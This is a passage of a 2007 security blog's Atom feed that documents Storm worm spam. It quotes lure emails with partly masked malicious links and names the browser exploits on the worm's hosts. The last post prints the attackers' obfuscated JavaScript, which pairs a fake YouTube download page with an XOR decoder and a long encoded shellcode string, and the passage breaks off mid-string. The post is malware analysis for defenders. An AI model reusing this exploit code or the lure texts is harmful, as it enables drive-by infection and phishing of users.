/&gt;&lt;blockquote&gt;&lt;br /&gt;Subject: this video is not out yet&lt;br /&gt;Body: Fat Boy just filmed their new video.&lt;br /&gt;&lt;br /&gt;Be the first to see it. Click here to download it: http://xxx.211.45.200/&lt;br /&gt;&lt;/blockquote&gt;</content><link rel='alternate' type='text/html' href='http://www.johnhsawyer.com/2007/08/rock-bands-get-little-storm-love.html' title='Rock bands get a little Storm love'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=12227024&amp;postID=830557189262091301' title='0 Comments'/><link rel='replies' type='application/atom+xml' href='http://www.johnhsawyer.com/atom.xml' title='Post Comments'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/12227024/posts/default/830557189262091301'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/12227024/posts/default/830557189262091301'/><author><name>John H. Sawyer</name><uri>http://www.blogger.com/profile/07459314688135865938</uri><email>noreply@blogger.com</email></author></entry><entry><id>tag:blogger.com,1999:blog-12227024.post-6537759461849717077</id><published>2007-08-28T11:58:00.001-04:00</published><updated>2007-08-28T12:03:32.673-04:00</updated><title type='text'>Storm takes one step back, six steps forward</title><content type='html'>&lt;div xmlns='http://www.w3.org/1999/xhtml'&gt;I was getting bummed since I hadn't seen any Storm worm infection letters since yesterday around 3pm, but Storm worm loves me and would never leave me hanging. This just came in.&lt;br /&gt;&lt;blockquote&gt;&lt;br /&gt;Subject: Helps us out and let us say thanks&lt;br /&gt;Body: We are looking for Consumer opinions of our new software Home Reno Planner&lt;br /&gt;&lt;br /&gt;This beta testing will enable us to fine tune the software for public release. A free copy of the program plus free updates will be yours for helping out.&lt;br /&gt;&lt;br /&gt;Download the software, See What you think, and Email us your thoughts. If you would like to help us with this no obligation Beta test, follow this link to our secure download server: http://xx.183.196.147/setup.exe&lt;br /&gt;&lt;/blockquote&gt;&lt;br /&gt;Where is the obfuscated link to the IP? I was surprised to see the raw IP listed along with a link directly to an EXE. It is definitely Storm worm hosting the malware. A quick download and check of the server header shows:&lt;br /&gt;&lt;blockquote&gt;&lt;br /&gt; HTTP/1.1 200 OK&lt;br /&gt; Server: nginx/0.5.17&lt;br /&gt; Date: Tue, 28 Aug 2007 14:59:22 GMT&lt;br /&gt; Content-Type: application/octet-stream&lt;br /&gt; Content-Length: 140367&lt;br /&gt; Connection: close&lt;br /&gt; Accept-Ranges: bytes&lt;br /&gt;&lt;/blockquote&gt;&lt;br /&gt;Bringing up http://xx.183.196.147/ without the "setup.exe" shows it is also doubling as a StormTube host complete with obfuscated Javascript that contains a shotgun approach to exploiting the web browser. A cursory glance show about a half dozen exploits that may be for IE WebViewFolderIcon setSlice(), WinZip WebViewFolderIcon, Yahoo WebCam, Microsoft 'msdds.dll' COM Object, QuickTime and AdobeWScriptShell.&lt;br /&gt;Since including code in the body of the blog is a pain, here's the files if you want to play with them.&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;a href='http://www.johnhsawyer.com/files/newstorm_obfuscated.txt'&gt;File containing the obfuscated javascript.&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href='http://www.johnhsawyer.com/files/newstorm_deobfuscated.txt'&gt;File of the deobfuscated code showing the exploits.&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;</content><link rel='alternate' type='text/html' href='http://www.johnhsawyer.com/2007/08/storm-takes-slight-step-back.html' title='Storm takes one step back, six steps forward'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=12227024&amp;postID=6537759461849717077' title='0 Comments'/><link rel='replies' type='application/atom+xml' href='http://www.johnhsawyer.com/atom.xml' title='Post Comments'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/12227024/posts/default/6537759461849717077'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/12227024/posts/default/6537759461849717077'/><author><name>John H. Sawyer</name><uri>http://www.blogger.com/profile/07459314688135865938</uri><email>noreply@blogger.com</email></author></entry><entry><id>tag:blogger.com,1999:blog-12227024.post-2832486890033590036</id><published>2007-08-28T10:25:00.001-04:00</published><updated>2007-08-28T10:32:33.465-04:00</updated><title type='text'>Wish List: PE Posters</title><content type='html'>Ero Carrera has created a &lt;a href="http://www.cafepress.com/dkbza/"&gt;CafePress store&lt;/a&gt; to sell poster-sized versions of his "&lt;a href="http://www.cafepress.com/dkbza.164084665"&gt;Portable Executable Format: A File Walkthrough&lt;/a&gt;"  and  "&lt;a href="http://www.cafepress.com/dkbza.162471691"&gt;Portable Executable Format&lt;/a&gt;."&lt;br /&gt;&lt;br /&gt;How hot are these? Check out his &lt;a href="http://blog.dkbza.org/2007/08/visualizations-of-portable-executable.html"&gt;blog post&lt;/a&gt; about it for more info.&lt;br /&gt;&lt;a href="http://www.johnhsawyer.com/posters.png" border="0"&gt;&lt;img src="http://www.johnhsawyer.com/posters.png" width="375"&gt;&lt;/a&gt;</content><link rel='alternate' type='text/html' href='http://www.johnhsawyer.com/2007/08/wish-list-pe-posters.html' title='Wish List: PE Posters'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=12227024&amp;postID=2832486890033590036' title='0 Comments'/><link rel='replies' type='application/atom+xml' href='http://www.johnhsawyer.com/atom.xml' title='Post Comments'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/12227024/posts/default/2832486890033590036'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/12227024/posts/default/2832486890033590036'/><author><name>John H. Sawyer</name><uri>http://www.blogger.com/profile/07459314688135865938</uri><email>noreply@blogger.com</email></author></entry><entry><id>tag:blogger.com,1999:blog-12227024.post-139126488597205031</id><published>2007-08-23T10:51:00.000-04:00</published><updated>2007-08-28T10:26:18.911-04:00</updated><title type='text'>The Ever Changing Storm</title><content type='html'>Storm worm just keeps rolling with the punches. After you warn users, family and friends about the bogus messages and how to identify them, Storm changes it up. This time, they learned that users might not click on an IP address so they've obfuscated it with HTML.&lt;br /&gt;&lt;blockquote&gt;&lt;br /&gt;Welcome,&lt;br /&gt;&lt;br /&gt;We are glad you joined Free Ringtones.&lt;br /&gt;&lt;br /&gt;Account Number: 895942644&lt;br /&gt;Login ID: user2662&lt;br /&gt;Your Password ID: zi461&lt;br /&gt;&lt;br /&gt;For security purposes please login and change the temporary Login ID and Password.&lt;br /&gt;&lt;br /&gt;Click on the secure link or paste it to your browser: &lt;a href="http://xxx.xxx.xxx.xxx/"&gt;Free Ringtones&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Thank You,&lt;br /&gt;Welcome Department&lt;br /&gt;Free Ringtones&lt;br /&gt;&lt;/blockquote&gt;&lt;br /&gt;Or&lt;br /&gt;&lt;blockquote&gt;&lt;br /&gt;OMG, what are you doing man. This video of you is all over the net. check it out yourself http://www.youtube.com/watch?v=pQoPSGAGXMW&lt;br /&gt;&lt;/blockquote&gt;&lt;br /&gt;or...there's just too many to include. It's quite amazing. When the messages were pr0n related with subjects like "Do you think my bra is too tight. Maybe I should take it off. let me know what you think" and "Oh man I found these pictures of my ex-secretary on her computer after I fired her. Check em out!", they all had the following in their header:&lt;br /&gt;&lt;blockquote&gt;&lt;br /&gt;X-MSMail-Priority: Normal&lt;br /&gt;X-Mailer: Microsoft Outlook Express 5.50.4807.1700&lt;br /&gt;X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700&lt;br /&gt;&lt;/blockquote&gt;&lt;br /&gt;The new membership e-mails don't have any mail client info. The Storm worm host directed to by the e-mail does have some obfuscated javascript with exploit payload. Note: some of this code is going to scroll off the screen. I just couldn't figure out an elegant way of doing it so it's just gonna look like crap. ;-)&lt;br /&gt;&lt;blockquote&gt;&lt;br /&gt;&amp;lt;img src="http://www.youtube.com/img/pic_youtubelogo_123x63.gif"&amp;gt;&lt;br /&gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;Your Download Should Begin Shortly. If your download does not start in approximately 15 seconds, you can &amp;lt;a href="/video.exe"&amp;gt;click here&amp;lt;/a&amp;gt; to launch the download and then press Run.&lt;br /&gt;&lt;br /&gt;&amp;lt;Script Language='JavaScript'&amp;gt;&lt;br /&gt;&lt;br /&gt;function xor_str(plain_str, xor_key){ var xored_str = ""; for (var i = 0 ; i &amp;lt; plain_str.length; ++i) xored_str += String.fromCharCode(xor_key ^ plain_str.charCodeAt(i)); return xored_str; }&lt;br /&gt;&lt;br /&gt;var plain_str = "\xb3\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\xaf\xdb\xc7\xde\xdf\xad\xaf\xdb\xd6\xd2\xd7\xad\xaf\xc0\xd0\xc1\xda\xc3\xc7\xad\xe5\xf2\xe1\xb3\xe0\xae\xe6\xfd\xf6\xe0\xf0\xf2\xe3\xf6\xbb\xb1\xb6\xe6\xa7\xa2\xa7\xa2\xb6\xe6\xa7\xa2\xa7\xa2\xb6\xe6\xa7\xa2\xa7\xa2\xb6\xe6\xa7\xa2\xa7\xa2\xb6\xe6\xa7\xa2\xa7\xa2\xb6\xe6\xa7\xa2\xa7\xa2\xb6\xe6\xa7\xa2\xa7\xa2\xb6\xe6\xa7\xa2\xa7\xa2\xb1\xba\xa8\xf7\xfc\xe8\xe0\xb8\xae\xe0\xa8\xee\xe4\xfb\xfa\xff\xf6\xbb\xe0\xbd\xff\xf6\xfd\xf4\xe7\xfb\xaf\xa3\xeb\xa3\xaa\xa3\xa3\xa3\xa3\xa3\xba\xa8\xe0\xb8\xae\xe6\xfd\xf6\xe0\xf0\xf2\xe3\xf6\xbb\xb1\xb6\xe6\xa6\xa7\xd6\xd1\xb6\xe6\xa4\xa6\xab\xd1\xb6\xe6\xab\xd1\xa0\xd0\xb6\xe6\xa0\xa6\xa4\xa7\xb6\xe6\xa3\xa0\xa4\xab\xb6\xe6\xa6\xa5\xd5\xa6\xb6\xe6\xa4\xa5\xab\xd1\xb6\xe6\xa3\xa0\xa1\xa3\xb6\xe6\xa0\xa0\xd5\xa6\xb6\xe6\xa7\xaa\xd0\xaa\xb6\xe6\xd2\xd7\xa7\xa2\xb6\xe6\xd7\xd1\xa0\xa0\xb6\xe6\xa3\xd5\xa0\xa5\xb6\xe6\xa2\xa7\xd1\xd6\xb6\xe6\xa0\xab\xa1\xab\xb6\xe6\xa4\xa7\xd5\xa1\xb6\xe6\xd0\xa2\xa3\xab\xb6\xe6\xa3\xd7\xd0\xd1\xb6\xe6\xd7\xd2\xa3\xa0\xb6\xe6\xd6\xd1\xa7\xa3\xb6\xe6\xa0\xd1\xd6\xd5\xb6\xe6\xa4\xa6\xd7\xd5\xb6\xe6\xa6\xd6\xd6\xa4\xb6\xe6\xa6\xd6\xab\xd1\xb6\xe6\xa3\xa0\xa1\xa7\xb6\xe6\xa5\xa5\xd7\xd7\xb6\xe6\xa3\xd0\xab\xd1\xb6\xe6\xab\xd1\xa7\xd1\xb6\xe6\xa2\xd0\xa6\xd6\xb6\xe6\xd7\xd7\xa3\xa0\xb6\xe6\xa3\xa7\xab\xd1\xb6\xe6\xa3\xa0\xab\xd1\xb6\xe6\xd0\xa0\xd0\xa6\xb6\xe6\xa4\xa1\xa4\xa6\xb6\xe6\xa5\xd7\xa5\xd0\xb6\xe6\xa5\xd6\xa5\xd5\xb6\xe6\xa5\xa7\xa1\xd6\xb6\xe6\xa5\xd0\xa5\xd0\xb6\xe6\xa7\xa0\xa3\xa3\xb6\xe6\xa6\xd0\xa0\xd2\xb6\xe6\xa1\xd6\xa6\xa6\xb6\xe6\xa4\xab\xa5\xa6\xb6\xe6\xa3\xa3\xa5\xa6\xb6\xe6\xd0\xa3\xa0\xa0\xb6\xe6\xa3\xa0\xa5\xa7\xb6\xe6\xa0\xa3\xa7\xa3\xb6\xe6\xa3\xd0\xa4\xab\xb6\xe6\xa7\xa3\xab\xd1\xb6\xe6\xab\xd1\xa3\xd0\xb6\xe6\xa2\xd0\xa4\xa3\xb6\xe6\xab\xd1\xd2\xd7\xb6\xe6\xa3\xab\xa7\xa3\xb6\xe6\xa3\xaa\xd6\xd1\xb6\xe6\xa7\xa3\xab\xd1\xb6\xe6\xab\xd7\xa0\xa7\xb6\xe6\xa4\xd0\xa7\xa3\xb6\xe6\xa7\xa3\xab\xd1\xb6\xe6\xaa\xa6\xa0\xd0\xb6\xe6\xab\xd6\xd1\xd5\xb6\xe6\xa3\xd6\xa7\xd6\xb6\xe6\xd6\xab\xd6\xd0\xb6\xe6\xd5\xd5\xab\xa7\xb6\xe6\xd5\xd5\xd5\xd5\xb6\xe6\xd6\xd0\xab\xa0\xb6\xe6\xab\xa0\xa3\xa7\xb6\xe6\xa1\xa7\xa1\xd0\xb6\xe6\xd5\xd5\xa0\xd0\xb6\xe6\xaa\xa6\xd7\xa3\xb6\xe6\xd1\xd5\xa6\xa3\xb6\xe6\xa2\xd2\xa0\xa5\xb6\xe6\xa4\xa3\xa1\xd5\xb6\xe6\xa5\xd5\xd6\xab\xb6\xe6\xd5\xd5\xd5\xd5\xb6\xe6\xab\xd1\xd5\xd5\xb6\xe6\xa1\xa7\xa6\xa7\xb6\xe6\xab\xd7\xd5\xd0\xb6\xe6\xd1\xd2\xa6\xa1\xb6\xe6\xd7\xd1\xa0\xa0\xb6\xe6\xa6\xa0\xa6\xa0\xb6\xe6\xd6\xd1\xa6\xa1\xb6\xe6\xa6\xa0\xa1\xa7\xb6\xe6\xd7\xa3\xd5\xd5\xb6\xe6\xd1\xd5\xa6\xd7\xb6\xe6\xd5\xd6\xaa\xab\xb6\xe6\xa3\xd6\xab\xd2\xb6\xe6\xa6\xa0\xd6\xab\xb6\xe6\xd5\xd5\xd5\xd5\xb6\xe6\xab\xa0\xd5\xd5\xb6\xe6\xa3\xa7\xd6\xd0\xb6\xe6\xa1\xd0\xab\xa0\xb6\xe6\xa5\xa1\xa1\xa7\xb6\xe6\xd7\xa3\xd5\xd5\xb6\xe6\xa4\xd6\xd1\xd5\xb6\xe6\xd6\xa1\xd7\xab\xb6\xe6\xd6\xab\xa4\xa0\xb6\xe6\xd5\xd5\xa7\xa3\xb6\xe6\xd5\xd5\xd5\xd5\xb6\xe6\xd5\xd5\xa6\xa1\xb6\xe6\xd6\xab\xd7\xa3\xb6\xe6\xd5\xd5\xd7\xa4\xb6\xe6\xd5\xd5\xd5\xd5\xb6\xe6\xa4\xa7\xa5\xab\xb6\xe6\xa4\xa3\xa4\xa7\xb6\xe6\xa1\xd5\xa0\xd2\xb6\xe6\xa0\xab\xa1\xd5\xb6\xe6\xa1\xd6\xa0\xaa\xb6\xe6\xa0\xa0\xa0\xa7\xb6\xe6\xa0\xa2\xa1\xd6\xb6\xe6\xa0\xa5\xa0\xaa\xb6\xe6\xa0\xa6\xa1\xd6\xb6\xe6\xa5\xa5\xa1\xd5\xb6\xe6\xa5\xd0\xa5\xaa\xb6\xe6\xa1\xd6\xa5\xa6\xb6\xe6\xa5\xab\xa4\xa3\xb6\xe6\xa3\xa3\xa4\xa3\xb1\xba\xa8\xaf\xbc\xc0\xd0\xc1\xda\xc3\xc7\xad\xaf\xbc\xdb\xd6\xd2\xd7\xad\xaf\xd1\xdc\xd7\xca\xad\xaf\xd6\xde\xd1\xd6\xd7\xb3\xc0\xc1\xd0\xae\xb1\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\x